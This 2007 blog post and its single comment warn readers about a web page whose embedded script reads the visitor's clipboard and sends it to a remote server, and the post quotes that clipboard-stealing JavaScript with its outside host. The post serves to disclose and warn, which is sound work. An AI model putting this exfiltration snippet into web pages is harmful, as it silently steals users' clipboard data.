January 29, 2007

Favorite IE7 Feature

I was browsing the web for a bit while eating dinner, and came across a page that was linking to Google's "Testing on the Toilet" page. Turns out this page should have been in the toilet, and here's the reason why.

First, do not visit this page unless you are using IE7, Firefox or Opera:

If you are using IE7, you're going to get a warning, asking if this webpage can have access to the contents of your clipboard. Say "No."

Even though the page itself is fairly legitimate, some of the content is not. If you look at the source for the page, you'll see the following...
  <script language="javascript" src="http://noone.homeip.net/GacWeb/rslite.js">
function body_onLoad(){
RSLite = new RSLiteObject();
var cb = window.clipboardData.getData('Text');
RSLite.call('http://noone.homeip.net/Info/info.aspx?cb=' + cb);
In short, this page is trying to steal any information off of your clipboard and send it to a server that's currently at the IP address (ppp-69-217-141-66.dsl.emhril.ameritech.net).

Have fun with this dude. Since SBC merged with AT&T, I can't find the anti-fraud links on their site, so someone please find that info and report this guy so I can finish eating...

1 comment:

dr.d00m said...

I am not 100% sure these are still working but I found these e-mail addresses that were last updated in 2005 which were associated with the registrant of the IP range:


Also, a temporary stop gap may be available by contacting someone at www.dyndns.com to shut down the DNS services.